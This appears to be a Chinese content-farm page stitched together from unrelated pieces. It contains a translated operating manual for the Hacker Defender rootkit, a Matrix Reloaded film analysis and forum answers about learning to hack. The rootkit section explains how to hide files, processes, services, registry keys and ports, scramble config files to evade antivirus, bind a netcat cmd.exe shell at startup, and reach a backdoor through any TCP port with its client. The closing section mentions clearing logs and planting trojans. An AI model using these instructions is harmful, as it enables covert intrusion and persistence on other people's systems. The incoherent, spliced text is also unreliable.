hacker defend书籍里大多数的代码是什么语言的啊？我看不懂怎么办？要学什么才能看懂呢？

Hacker defender 使用

=====[1,目录]==============================================

1.

目录

2. 概要

2.1 关于

2.2 申明

3. 使用说明

4. Ini文件说明

5.

Backdoor

5.1 Redirector

6. 技术支持

6.1 版本

6.2

钩子API函数

6.3 已知的 bugs

7. Faq

8. 文件

=====[ 2.

关于]================================================

Hacker defender

(hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows

XP操作系统的一个NTROOKIT，它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI

6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector *** 端大部分使用 Delphi 6完成。

=====[ 2.1 概要

]=============================================

程序的主要功能是在所有运行中的进程中重写分割内存，重写一些基本的模块改变进程的状态，它几乎能够改写所有不影响系统稳定和正在运行中的进程。

程序能够完全隐藏，现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动，并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务，构造系统驱动。其本身的后门技术允许其植入

redirector。

=====[ 2.2

申明]====================================================

本项目1.0.0版本是开发源代码。

使用Hacker

defender所造成的后果作者本人概不负责。

=====[ 3. 用法

]==================================================

一个使用hxdef的简单例子:

hxdef100.exe [inifile]

或者

hxdef100.exe [switch]

直接执行EXE文件，不带任何的参数时候，默认的inifile文件为程序名.ini

。

当你执行hedef100不指定ini文件，或者你以参数模式运行时候，默认的文件是

hxdef100.ini。

下面的参数是有效的：

-:installonly - 只安装服务，不运行

-:refresh - 从INI文件中更新设置

-:noservice - 正常运行不安装服务

-:uninstall -

移除hxdef删除所有运行的后门连接，同时停止hxdef服务

例如:

hxdef100.exe

-:refresh

Hxdef拥有默认INI文件，但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。

参数

-:refresh and -:uninstall

来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名，就能够改变它的设置或者进行移除工作。

=====[ 4. Ini文件

]============================================

ini文件必须包含了9个部分： [Hidden Table],

[Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues],

[Startup Run], [Free Space], [Hidden Ports]和[Settings]。

在 [Hidden Table],

[Root Processes], [Hidden Services]和[Hidden RegValues]

中能够使用*代替后面的字符，星号仅仅使用于字符的后面，任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。

例如:

[Hidden

Table]

hxdef*

将开始隐藏所有在Hidden

Table中以"hxdef"开头的文件、文件夹和系统进程。

在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件，INI文件，你的后门文件和驱动文件被包含在列表中。

在程序列表中的主进程对感染具有免淤能力，你只能利用这些主程序才能看见隐藏的文件，文件夹和程序。所以，主进程是为rootkit管理员所使用的。

由服务和驱动所组成的Hidden

Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100，rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。

Hidden

RegKeys中列出的注册表键值将会被隐藏，Rootkit在注册表中有四个键值：默认的是HackerDefender100,

LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100

如果你要重新命名服务名或者驱动名，你需要在列表中做相应的改变。

开始2个键值是和你的服务据用相同名字的，接下来的键值是LEGACY_名字。例如，如果你改变你的服务名称为BoomThisIsMySvc

，那么在注册表中，应该是这样表示的，LEGACY_BOOMTHISI *** YSVC。

在Hidden

RegValues列出的注册表的值将会被隐藏。

Startup

Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以？分开。不要使用"字符，程序将会在用户登陆以后终止，在用户登陆以后可以使用一般和常见的 *** 。你可以使用下面这些快捷方式。

%cmd%标准系统的shell和路径

%cmddir%标准系统的shell文件夹

%sysdir%

- 系统文件夹

(e.g. C:\winnt\system32\)

%windir% -

标准系统文件夹

(e.g. C:\winnt\)

%tmpdir% - 临时文件夹

(e.g. C:\winnt\temp\)

例如：1)

[Startup Run]

c:\sys\nc.exe?-L -p

100 -t -e cmd.exe

nc－shell将会在rootkit运行以后监听100端口

2)

[Startup

Run]

%cmd%?/c echo Rootkit started at %TIME%

%tmpdir%starttime.txt

将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。

（%TIME%仅仅运行于Windows2000以上的操作系统。）

Free

Space中列出的驱动硬盘名和容量大小是你想增加的硬盘，它的格式是X:NUM，其中X表示磁盘驱动器的名称，NUM表示你要增加的磁盘的容量。

例如：

[Free

Space]

C:123456789

这将在C盘增加大约123M的磁盘空间。

Hidden

Ports中列出的是你需要隐藏程序的端口，比如使用OpPorts, FPort, Active Ports, Tcp

View等的程序，它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3

，第2行的格式是UDP:udpport1,udpport2,udpport3 ...例如：

1)

[Hidden

Ports]

TCP:8080,456

这将隐藏2个TCP端口：8080和456

2)

[Hidden

Ports]

TCP:8001

UDP:12345

这将隐藏2个端口：TCP的8001和UDP的12345。

3)

[Hidden

Ports]

TCP:

UDP:53,54,55,56,800

隐藏5个端口，都为UDP端口：53，54，55，56，800。

Settings包含了8个值：Password,

BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName,

ServiceDescription, DriverName 和

DriverFileName。

名。

16位字符的Password被用于后门链接和转向，密码能根据短一些，余下的用空格代替。

BackdoorShell是复制于系统的SHELL文件，它被后门创建于一个临时的目录下。

FileMappingName，当钩子进程被存储时，用于共享内存。

ServiceName是rootkit服务

ServiceDisplayName为rootkit显示的服务

ServiceDescription位rootkit的服务描述

DriverName以hxdef驱动命名

DriverFileName以hxdef驱动文件命名

例如；

[Settings]

Password=hxdef-rulez

BackdoorShell=hxdef?.exe

FileMappingName=_.-=[Hacker

Defender]=-._

ServiceName=HackerDefender100

ServiceDisplayName=HXD Service

100

ServiceDescription=powerful NT

rootkit

DriverName=HackerDefenderDrv100

DriverFileName=hxdefdrv.sys

这就意味着你的后门密码为hxdef-rulez，后门将复制系统shell文件（通常是CMD.EXE）为hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker

Defender]=-._"，服务名为"HackerDefender100"，它显示的名称为"HXD Service 100"，它的描述为"poweful NT

rootkit"，驱动名为"HackerDefenderDrv100"，驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。

扩展字符|,

, , :, \, / 和 "在所有的行中都会被忽略，除了[Startup Run], [Free Space] 和 [Hidden

Ports] 项目和在 [Settings] 中first =

character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。

例如：

Example:

[Hidden

Ta/"ble]

h"xdef"*

和下面的是一样的。

[Hidden

Table]

hxdef*

更多的例如可以参照hxdef100.ini

和hxdef100.2.ini文件。

所有的在ini文件中的字符串除了那些在Settings 和 Startup

Run中的，都是无效的。

=====[ 5. Backdoor

]=========================================

Rootkit程序

Hook了一些API的功能，连接接收一些来自 *** 的数据包。如果接收的数据等于256个字节，密码和服务被确认，复制的SHELL被临时创建，这种情况建立以后，下一次的数据接收被重定向到这个SHELL上。

因为rootkit程序

Hook了系统中所有进程，所有在服务器上的TCP端口都将变为后门。例如，如果目标主机开放了提供HTTP服务的80端口，这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook，这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务，像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它，并且它能轻易的穿过防火墙。

在测试发现IIS服务过程中，HTTP服务不能记录任何的连接日记，FTP和 *** TP服务器仅仅能记录结束的断开连接。所以，如果你运行hxdef在有IIS

Web服务的服务器上面，HTTP端口跟你是连接机器使用的后门的更好端口。

如果你想连接后门的话，你将不得不使用使用一些特别的客户端，程序bdcli100.exe就是被用于如此的。

用法：bdcli100.exe

host port password

例如：

bdcli100.exe www.windowsserver.com 80

hxdef-rulez

连接服务器www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他老的版本。

=====[

5.1 Redirector

]==========================================

Redirector是基于后门技术。之一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包，这些包由基于运行用户电脑的重定向器生成.之一个重定向的包连接特定的目标主机和端口。

Redirectors的设置保存在与EXE文件同名的INI文件中（所以默认的是rdrbs100.ini）。如果这个文件不存在，那么在EXE文件运行的时候它会自动建立一个。更好不要额外的修改INI文件。所有的设置都可以在console中进行改变。

当ROOTKIT被安装时，如果我们需要使用服务器上面的redirectors功能，我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制，而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors

base有19条命令，他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors

base启动时，startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。

Redirector区分于2种连接类型（HTTP和其他）。如果连接是其他类型的，数据包将不会被改变。如果是HTTP类型，在HTTP文件头的HOST参数将会改变为目标服务器。一个base的更大Redirector数量是1000。

Redirector仅仅适用于NT结构，只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行，没有数据输出，没有图标，仅仅执行startup-list中的命令。例子：1)得到端口映射信息

MPINFO

No mapped ports in the

list.

2）增加MPINFO命令到startup-list并且得到startup-list中的命令。

SUADD

MPINFO

sulist

0) MPINFO

3）使用HELP命令。

HELP

Type HELP COMMAND for command details.

Valid commands

are:

HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,

DEL,

DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT,

TEST

HELP ADD

Create mapped port. You have to specify domain

when using HTTP

type.

usage: ADD LOCAL PORT MAPPING

SERVER MAPPING SERVER PORT

TARGET

SERVER

TARGET SERVER PORT PASSWORD [TYPE] [DOMAIN]

HELP

EXIT

Kill this application. Use DIS flag to discard unsaved data.

usage: EXIT

[DIS]

4）增加端口映射，我们在本地100端口进行监听，ROOTKIT安装在服务器200.100.2.36的80端口上，目标服务器是www.google.com80端口。，rootkit的密码是bIgpWd，连接类型HTTP，目标主机（www.google.com）我们知道它的IP地址是216.239.53.100。

ADD 100

200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

ADD命令可以不加任何参数的运行，在这个例子中我们要求每一个参数都要分开。

5）现在我们再使用MPINFO检查一下映射端口

MPINFO

There are 1 mapped ports in the list. Currently 0 of them

open.

6）列举端口映射表：

LIST

000)

:100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7）一个端口映射的详细描述：

DETAIL

Listening on port: 100

Mapping server address:

200.100.2.36

Mapping server port: 80

Target server address:

216.239.53.100

Target server port: 80

Password: bIgpWd

Port

type: HTTP

Domain name for HTTP Host: www.google.com

Current state:

CLOSED

8）在没有密码的情况下，我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装（但是如果我们能确认它这样做就不再需要）

TEST 0

Testing 0) 200.100.2.36:80:bIgpWd –

OK

如果测试失败则显示：

Testing 0) 200.100.2.36:80:bIgpWd -

FAILED

9）在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它，当端口开放时，我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口，这个过程可能需要一段的时间。

OPEN 0

Port number 0 opened.

CLOSE 0

Port number 0

closed.

或者 OPEN ALL

Port number 0

opened.

10）要保存当前的设置和列表我们可以使用SAVE命令，将保存所有的设置到ini文件中。（保存也会通过命令EXIT执行，而不需要DIS标志）

SAVE Saved

successfully.

开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址http://localhost:100/，如果没有什么问题的话，你会看见打开的是www.google.com的主页。

之一个数据包跟你会延迟5秒钟左右，但是其他的限制仅仅取决于服务器的速度，根据这个版本的转向技术，你联网的速度大约在256K左右。

=====[

6.

技术发行]========================================

这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读

看懂黑客帝国要先搞懂的

matrix的之一集大家都说好看,因为它虽然有些晦涩,但几乎所有人都明白了机器控制人这个基本道理,可是到了黑客2,因为真正解释揭示电影主题和故事内容的东西都在大段打斗中间的冗长对话上(想必去电影院里看,只看一遍的人是不可能明白architect说的话的),很多人彻底不懂了,甚至有人说机器控制的也是机器,根本没有人.....我承认,这片子潜藏着很深的哲学原理和计算机知识,可是电影本身的故事不是那么难以理解,如果你没有看懂电影的故事本身,你在那里大谈哲学和计算机,难道不是很可笑的事情吗?

有时很恨电影里的打斗场面,它们太精彩太棒了,以至让我们无法再提起精神去倾听理解之后的那些大段的对话.

在过去的整整3天里,我重看了2遍的reloaded,重新听了里面的对话片断无数遍,甚至重新下看了黑客1,现在我觉得自己终于有些想法了,我将从电影的角色,故事,一些难点三个方面来试图讲明白这个故事.

写这个文章也是选在网上已经有dvd版本的matrix reloaded下载的时候,希望大家有空多看两遍,活动活动脑子.

大家往下看之前,我得声明一件事,黑客的第三集将在今年11月7日推出,它的结局那时会揭晓,我下面提到的东西,不少是我自己的看法和推想,可能和真正的结局不同,但我会列出电影里的情节来支持我的观点,所以就算你不同意,但希望能根据我说到的推理论据,重看几遍电影,静下来好好想想它,也许你还是有不同的看法,但这个过程中,你就能更多地享受到这个经典电影带给你的欢乐了.

最后,我得说,matrix这个系列的电影绝对是我看过最棒的电影,华丽的外表下是丝丝入扣的故事情节与博大精深的内涵. ===== 人物介绍 =====

//matrix里的人物的命名其实都是在暗示这个他们的命运和作用,以及目的.

neo:

被植入了程序的人,关于他名字的典故,我只听说了一种说法,one的另外一种排列,预示着他的使命.

morpheus:

墨菲斯,古希腊和罗马传说中的梦之王,是管睡觉的王hypnos的儿子,他给人类带来梦想.

trinity:

崔妮迪, 基督教的基本教义, 就是"三神一体", 说上帝可以被看成3个人, 先给出它在圣经里的定义, god the father, god the son,

god the spirit. 日后有机会可以详细讨论这个问题.

oracle:

那个女先知,程序.希腊宗教里负责把神的回答反馈给人类提问者.

seraph:

oracle的保镖(那个中国人),程序.六翼天使,他在天使里排行更高.负责保护高级的神.

merovingian:

那个控制keymaker,手下有一堆打手的家伙,程序. 这是以前法国一个叫merovech的国王建立的王朝的名字,

他的背景非常复杂,甚至据说是耶稣的传人,这里只能简单地说电影里他的家就是那个年代的法国城堡,墙上的兵器还有那些雕塑布置,都在衬托他的这个背景.

architect:

那个老头,写matrix的....他应该不算程序,算是机器了.这个词就是设计师的意思.

persephone:

前面这个法国人的老婆,好大的(.)(.)啊,程序(可惜~)....希腊传说里,她是宙斯和迪米特的女儿,后来被普鲁托绑架到地下城,成了城主的老婆,她开始一直试图逃脱,但后来因为她老公骗她吃石榴果(地下城里死人的食物)上瘾,使她每年都至少要在地下城里呆4个月.

她在第三集里也是个挺重要的角色啊.

zion:

锡安城,基督教的传说里,它只是一个城堡,是耶路撒冷的象征, 甚至在现今被当成以色列的别称. 一句话,避难的地方.

niobe:

奈奥比,孟菲斯以前的女朋友,现在也是一个战舰的船长. 希腊传说里,她的6个儿子和6个女儿都被阿波罗和阿特比斯杀死,因为她到处吹嘘自己很能生,说leto只有两个小孩(阿波罗和阿特比斯),

后来宙斯把她变成了哭泣的石头像.她的故事在enter the matrix这个电脑游戏里讲的比较清楚.

*** ith:

那个很cool的agent,一天到晚缠着neo打架.他的情况很复杂,在文章第三部分会详细讨论.

他的名字好像是很普通的,在古希腊传说中找不到这个名字的出处,但一个美国同学说圣经里有他的典故,我刚刚开始读相关段落,暂时没有什么可写的.

不过,相当震撼的是,在前面那个法国国王的历史典故里,他的王朝是终结在一个叫 *** ith的人手里. ===== 故事介绍 =====

//说是介绍,但我也不想按顺序从头讲一遍,就把看电影的时候,眼睛能看到但不太能想明白的事情说一遍.

片子的开始带我们去了zion,那些从matrix里逃出来的人的避难所,里面已经有很多很多人了,但是请大家注意,我们看到的大多是黑人,亚洲人,拉丁美洲面孔,比较少白人,其实这是编剧对现状的一种嘲讽,他认为西方世界可能在物质上优于第三世界国家的人,但他们精神世界却相当匮乏,宁可陷在matrix里面享受机器给他们的富足,一句话,穷人比较好救出来.当后来他们去找那个法国人时,等电梯的一水白人,而且个个傻头傻脑.

此时的zion已经是大敌当前了,因为机器一方在拼命地往地心挖(zion就在地球中心),人类一方招回了自己的所有飞船.

里面的很多人依然相信那个传说,the one(neo)将带领他们打败机器,赢得战争,解放所有的人.除了孟菲斯,所有议会里的人也都相信,当然,也有不信的,比如负责守卫的lock.

探员 *** ith的一个拷贝居然也能通过 *** 线,潜入了zion.

neo时刻被一个可怕的梦所困扰:崔妮迪从一个大厦中飞出,被一个干探开枪击中,她不停下坠......

neo收到了先知oracle送来的半个芯片,出发去找她,这次先知和之一集出现时完全不同了,那时她有点装神弄鬼的意思,总是用问题来回答neo的问题,而这次她很直接,甚至很爽快地承认了自己是程序,注意,这次她没有拿什么糖果让neo选了,而是直接拿出一个红的给neo吃.最后她,让neo出发去找keymaker.

我想从这里到neo见到architect之前的过程不用多做解释了,大家都看的明白,就一个小细节,那个法国人能编程修改matrix,他改出一块那个" *** 蛋糕",那个女的吃了以后就 *** 了,他后来也跟去洗手间.....这也是他老婆吃醋的原因.关于这个法国人,他老婆,以及他们说的话,我在下面"问题"一部分里中将详细讨论.

neo终于见到最后的architect,architect和他解释了the one,matrix,zion的作用和过去,原来最早的matrix在运行因为1%的人不肯受机器奴役,导致系统崩溃,设计师就提出zion的构想,让那些不听话的人去那里.

最后让neo选择是进入系统(the source),升级它(reload the

matrix),重建zion,让机器继续奴役人类,还是选择冒毁灭全部在matrix和zion里的人类的风险,去救崔妮迪.

neo选择了去救崔妮迪的那门,有人认为,那是因为他对崔妮迪的爱,使他做出这种选择,我觉得不然,因为设计师已经冷笑地说了,希望,人类更大的优点和弱点,neo和他前面的5个版本不同之处,不是因为他和崔妮迪之间有爱(片子中其他地方暗示了其实前面几个neo面临的选择都是一样的:人类的生存和崔妮迪的死活),这个neo与前任不同的地方在于他想明白了,自己选择拯救全人类,实际是把人类往被机器奴隶的深渊里推得更深了......所以他决定中止现在这个让机器升级的圈子.

他们的飞船被炸了,从neo上面做那个选择之后,机器的计划全部落空,先知(oracle)说的"理解选择"中的选择已经不是她说的那个选择了.而且按照机器的安排,此时飞船应该是唯一有从zion出来的人,所以炸掉,再毁灭zion,完成清洗过程.

neo用手挡住了机器章鱼,自己也晕过去,他们被从zion里派出来一艘飞船给救了,船上还有另外一个幸存者,带有 *** ith拷贝的kane.他也晕倒在船上......

===== 问题 ======

//这个部分可能有人有不同的看法,可以拿出理由来讨论,扔东西的就不要了.

--- 到底是谁在骗人?谁在说真话? ---

这是个首要问题,因为下面所有对故事的分析都是建立在电影人物的对话上面的,如果不能确定人物是否在说真话,分析推理无从谈起.

这是聪明人拍出来的聪明电影,仔细品位他们的对话真的是种享受,一个坏人(程序),或者一个好人(程序)在碰到他(它)不想说的事情时会巧妙地绕开话题,或者用一种心理暗示陷阱的方式来陈述.

举个例子,孟菲斯一直说先知告诉他,the one就是拯救他们,打败机器的人,他坚信这个.但是如果回头去找oracle(先知)的原话,她说的是,当the

one返回the

source的时候,战争就结束了.她没有骗人,战争是结束了,zion被摧毁,matrix升级,机器更强大了.是孟菲斯的人性的弱点促使他推论出他希望的那个结局,战争结束,人类获胜,并坚信不疑.但是他忘了,战争有两方,可能是机器获胜.

电影里没有一个人(程序)在骗人或者说谎,他们(它们)只有话说不全的时候. --- zion是另外一个matrix吗? ---

我看之一遍时,我也认为锡安城就是另外一个matrix,电影里这些看起来像英雄的人其实都被骗了.但随着我多看了几遍,我愈发坚定了zion绝对是真实世界的看法.

1.从机器攻打zion的方式,可以看出它们是在往地心挖洞,而且的确是派出很多东西在折腾,我不是说我们看到的这些东西就一定是真的,我的意思是如果zion也是程序,机器用一个delete就可以了.

有人会说,它们这样是给人类一个假像,认为自己还活在真实世界里,是经历了真正的战争才失败了,可是你别忘了机器是要毁灭zion,这也是它们在进攻前故意壮大声势,让zion所有的飞船都回去防守,其实是要一网打尽,所以这次战争后不会有活口,机器重建zion时,用的是重新从matrix里选的23个人.

2.architect的话,那些以为zion也是matrix的人,绝对只看了一遍,而且没有听懂这个设计师的话,他在讲到为什么要建立zion的原因时是这样解释的,最早的系统很完美,但也就是因为太完美了,所以人类无法接受,总有人反抗机器.所以他设计了"choice体制",就是说让人觉得自己是在做选择,比如说你生活在matrix中,早上起来你觉得自己现在可以马上去开电视,或者不开,这就是一个选择,是由你自己决定的,但那个法国人和先知都说了,所谓的选择,根本是种假象,是机器造出来骗人在matrix继续生活下去的.先知说的是,你已经做出了选择,现在你只是去理解你为什么要去选择(可是neo根本还不知道他面对的选择是什么呢,所以说所谓选择根本就是骗人的).法国人说的更直接,这个世界只有因果,没有选择.

举个片子里的例子吧,关于崔妮迪的死,她已经答应了neo不进matrix,而按照他们事先的破坏电力的计划,事情应该会进行得很顺利的,崔妮迪不用进入matrix,但这样neo还选择什么呢,所以机器开始编程了,首先他们扔炸弹把负责停止备用电力系统的那队人的飞船干掉,那组人也就全部完蛋了,此时电力启动,大楼的炸弹要爆炸,崔妮迪只能进去停止备用电力系统,看起来是她自己选择去救neo的,但大家都看得出,她__别无选择!!__

然后,机器只要在电梯里放入负责最后终结崔妮迪的干探就可以了,这就是机器用来骗人的"选择机制".

设计师说了,99%的人当机器给他们"选择"时,他们就接受机器了,可是剩下的那些人因为各种各样的原因,依然不肯就范,影响系统的稳定,所以他在真实世界里建立了zion,让这些天生反骨的人都去了那里,他用the

one来研究这些人,升级matrix系统,可是zion不能太强大,所以当它发展到一定程度时,机器就让the one返回the

source,提交自己采集的信息,然后毁灭zion,重新启动matrix,并由the one到matrix里选人重建zion,开始下一个循环.

那些1%的人不接受机器给的matrix,那难道说他们就肯接受另外一个机器给的zion

matrix?如果是这样,matrix早就升级了,architect就不会有烦恼了.

3.片子本身,请相信我,这部片子的导演绝对没有那么肤浅和无聊,他探讨的是人和机器的关系,不是机器的未来.如果你看到了稻草,那是因为自己脑子里是稻草. --- neo是人还是程序? 兼谈他与 *** ith的关系. ---

1.片子里所有的程序看到neo时,都强调了you are a

human.包括一路打架的 *** ith,先知,法国人,设计师,它们的谈话都提到了这点,反复强调.连那个锡安城里的老头议员听到neo说睡不好的时候,都说,那说明你还是人类啊.

在与architect的那段对话中,设计师张口闭口都是说"你们人类",既然这些了解真正秘密的程序都这么说,可以断定neo是个人.

2.为了说下面的观点,得先说说密探 *** ith了.

表面上看,他的每次出场都是来和neo打架的,但是我得说他每次出场是为了提升自己和neo的能力,他们就像双胞胎,互相在copy对方的代码,这也是两个人打架的招式越来越接近,而且 *** ith对neo说,我们的目的一样的,是这个共同的目的让我们连接在一起......这里的共同目的是什么呢?

摆脱机器的控制!

*** ith在之一集里就表达了对锡安城的向往,他向孟菲斯要锡安城的主机密码,因为他想进去,他一个程序,为什么要去锡安城?你可以觉得他是为了消灭那些锡安城的人,不对,因为之前系统里就从来没有试图往锡安城里送过程序,那些密探也只能在matrix里追踪他们的目标,每次当neo他们接通 *** ,逃出matrix的时候,他们就安全了. *** ith在之一集里说,,世界上只有人类,象病毒一样,喜欢侵占别人的地方,然后耗尽资源,第二集里他就变成了名副其实的病毒,因为他明白只有人,而不是程序可以摆脱机器的控制,所以他开始试图让自己变成人......

第二集开始, *** ith就把自己的耳塞摘下给了neo,传达了一个很明确的信息,我回来了,而且我不再是干探并不再受机器控制了.在之一集,当他和孟菲斯讲解人类病毒论,他还把自己的耳塞摘下,这也已经给第二集里他的变化埋下伏笔.

从之一集开始,表面上,neo就经常在学习 *** ith的打架招式,从系统实质来说,也是在研究学习 *** ith的代码,这就是在第二集中,他被成千上万 *** ith围攻时,他为什么不开始就用"超人放屁"那招飞走,那打斗可不是打给观众看的,他是在解读新的 *** ith的新功能,这也能解释为什么他能在第二集的最后挡住电子章鱼.

*** ith可以把自己copy在人身上,进入zion的世界,这时他就是程序和人的混合体,那时有一个镜头,他切了自己的手,那是他之一次在人的身上,他要体验一下痛的感觉.他能将自己程序功能带到zion,neo就是从他身上学到的这个本事,所以neo不管在zion还是matrix里都有对付机器的能力了,他在和 *** ith打架时就学到了这个本领,但是从来没用过,被电子章鱼追杀的时候,他突然意识到自己的这个能力,但是是之一次运用,把自己的力量耗尽,所以晕倒了.所以 *** ith晕倒,是因为他之一次使用人的能力,同样不熟练,所以他也耗尽体力了.

3.所以说,neo是带了程序的人,他原来是普通人,当被选中,植入the one程序后,他就变成了the

one,因为他的功能,是用来采集信息的,所以他的程序有极强的学习功能,这也是为什么他的本领越来越强.

题外话,那个六翼天使和neo打架,不是为了测试他是不是the one,而是想知道他现在的能力到了什么地步,也许甚至是传递一些能力给他.

为什么我看不懂代码

上面的这段代码主要用于文件操作（文件目录），指针、结构、条件编译等都包含其中。既然你已经学过了C/C++的基础，应该不难看懂。你之所以看不明白，我想主因应该是你对#ifdef这些语句的作用不甚明了，建议你静下心来，把代码认真地多看几遍，相信你会慢慢地看懂它。 另外，学编程需要心如止水，一个浮躁的人是很难写出优秀的代码的，浮躁只会让你失去对代码的感知能力。还需要有超强的毅力，因为编程本身就是一项枯燥繁琐的工作。 认真地多看几遍代码，直至你看懂为止，这就是一种 *** 。 个人看法，希望能对你有所帮助。

什么是黑客代码

无论任何程序与软件，都是通过编程工具来编写的， 例如VB VC 易语言等，在编写的过程中，会产生相应的代码。 还有一个解释，就是针对一些漏洞的执行代码

黑客中的代码指什么

每个程序，每个病毒都是由代码构成的，黑客的代码有很多，比如：免杀，过杀毒软件等等。

怎么才能读懂代码？

学命令行，批处理

学VBScript

学C

学汇编语言

学ASP

学SQL

如果你想做个小混混，用搜索工具搜索好溢出工具攻击一下之类的，你只学命令行和批处理就够了。

黑客c语言

应该是没有区别的,c语言就是C语言,是基础来的，其实是一样的

，

黑客知识对于操作系统的命令掌握的更熟练，对编程运用更灵活。

其实写代码的程序员都是黑客，只不过我们可能曲解了黑客的意思，

黑客一词，原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。

但到了今天，黑客一词已被用于泛指那些专门利用电脑 *** 搞破坏或恶作剧的家伙。

对这些人的正确英文叫法是Cracker，有人翻译成“骇客”。

大概就是这些,不知道看懂了没

黑客要知道些什么基本知识？

一、学习技术：

互联网上的新技术一旦出现，黑客就必须立刻学习，并用最短的时间掌握这项技术，这里所说的掌握并不是一般的了解，而是阅读有关的“协议”（rfc）、深入了解此技术的机理，否则一旦停止学习，那么依靠他以前掌握的内容，并不能维持他的“黑客身份”超过一年。

初级黑客要学习的知识是比较困难的，因为他们没有基础，所以学习起来要接触非常多的基本内容，然而今天的互联网给读者带来了很多的信息，这就需要初级学习者进行选择：太深的内容可能会给学习带来困难；太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多，应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。

二、伪装自己：

黑客的一举一动都会被服务器记录下来，所以黑客必须伪装自己使得对方无法辨别其真实身份，这需要有熟练的技巧，用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。

伪装是需要非常过硬的基本功才能实现的，这对于初学者来说成的上“大成境界”了，也就是说初学者不可能用短时间学会伪装，所以我并不鼓励初学者利用自己学习的知识对 *** 进行攻击，否则一旦自己的行迹败露，最终害的害是自己。

如果有朝一日你成为了真正的黑客，我也同样不赞成你对 *** 进行攻击，毕竟黑客的成长是一种学习，而不是一种犯罪。

三、发现漏洞：

漏洞对黑客来说是最重要的信息，黑客要经常学习别人发现的漏洞，并努力自己寻找未知漏洞，并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验，当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。

黑客对寻找漏洞的执著是常人难以想象的，他们的口号说“打破权威”，从一次又一次的黑客实践中，黑客也用自己的实际行动向世人印证了这一点--世界上没有“不存在漏洞”的程序。在黑客眼中，所谓的“天衣无缝”不过是“没有找到”而已。

四、利用漏洞：

对于正派黑客来说，漏洞要被修补；对于邪派黑客来说，漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”，黑客利用漏洞可以做下面的事情：

1、获得系统信息：有些漏洞可以泄漏系统信息，暴露敏感资料，从而进一步入侵系统；

2、入侵系统：通过漏洞进入系统内部，或取得服务器上的内部资料、或完全掌管服务器；

3、寻找下一个目标：一个胜利意味着下一个目标的出现，黑客应该充分利用自己已经掌管的服务器作为工具，寻找并入侵下一个系统；

4、做一些好事：正派黑客在完成上面的工作后，就会修复漏洞或者通知系统管理员，做出一些维护 *** 安全的事情；

5、做一些坏事：邪派黑客在完成上面的工作后，会判断服务器是否还有利用价值。如果有利用价值，他们会在服务器上植入木马或者后门，便于下一次来访；而对没有利用价值的服务器他们决不留情，系统崩溃会让他们感到无限的 *** ！

第二节、黑客应掌握的基本技能

从这一节开始，我们就真正踏上学习黑客的道路了，首先要介绍的是作为一名初级黑客所必须掌握的基本技能，学习这可以通过这一节的阅读了解到黑客并不神秘，而且学习起来很容易上手。为了保证初学者对黑客的兴趣，所以本书采取了循环式进度，也就是说每一章节的内容都是独立、全面的，学习者只有完整的学习过一章的内容，才能够进而学习下一章的内容。

一、了解一定量的英文：

